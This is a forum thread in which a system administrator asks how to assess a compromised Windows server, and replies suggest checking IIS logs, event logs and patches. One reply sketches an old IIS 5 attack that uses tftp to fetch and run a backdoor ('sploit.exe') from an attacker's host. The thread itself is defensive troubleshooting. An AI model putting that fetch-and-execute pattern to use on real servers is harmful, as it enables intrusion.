Tek-Tips is the largest IT community on the Internet today!
Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!
-
Congratulations strongm on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!
Assessing Compromised machine
- Thread starter sohtnax
- Start date
MichealC4
Programmer
- Jun 26, 2003
- 457
After the usual disconnecting from the network and so on, I personally would start by going through IIS logs. One way to inject is through running tftp from the web server, and downloading the backdoor from the attackers server. I would then check event logs. After that, I would review Windows Updates. I was backdoored through the LSASS vulnerability a while ago, for example. Make sure you keep a log of everything you do, for a) future reference and b) in case your superiors want to know. Good luck! 
----------------------------
"Security is like an onion" - Unknown
----------------------------
"Security is like an onion" - Unknown
- Thread starter
- #3
The server was definitely patched becuse I have an SUS server, and I was able to confirm that. I went through all the logs and found that it was the SYSTEM account which was compromised.
Not clear on how they would have used TFTP to do so, especially since they had accessed the system folder?
Not clear on how they would have used TFTP to do so, especially since they had accessed the system folder?
MichealC4
Programmer
- Jun 26, 2003
- 457
> Not clear on how they would have used TFTP to do so, especially since they had accessed the system folder?
There is an exploit in IIS 5 (but since you said you have the patches, this may not be the case) that allows something like this: -c 255.255.255.255 -f sploit.exe
-e sploit.exe
I can't remember the exact switches but you get the idea. Also, unicode (ie %20 for spaces) is often used in this.
But since you have the latest patches, this may not be the case. I'd go through your logs next and event logs as nipester suggested.
----------------------------
"Security is like an onion" - Unknown
There is an exploit in IIS 5 (but since you said you have the patches, this may not be the case) that allows something like this: -c 255.255.255.255 -f sploit.exe
-e sploit.exe
I can't remember the exact switches but you get the idea. Also, unicode (ie %20 for spaces) is often used in this.
But since you have the latest patches, this may not be the case. I'd go through your logs next and event logs as nipester suggested.
----------------------------
"Security is like an onion" - Unknown
Could it be they got in before the patches applied? Most patches prevent security access issues not fix them. e.g the Blaster / Nachi virus patch only prevented you getting infected, if you were already infeceted, you still had all the symptoms.
Stu..
Only the truly stupid believe they know everything.
Stu.. 2004
Stu..
Only the truly stupid believe they know everything.
Stu.. 2004
- Status
Similar threads
- Locked
- Question
- Locked
- Question
- Locked
- Question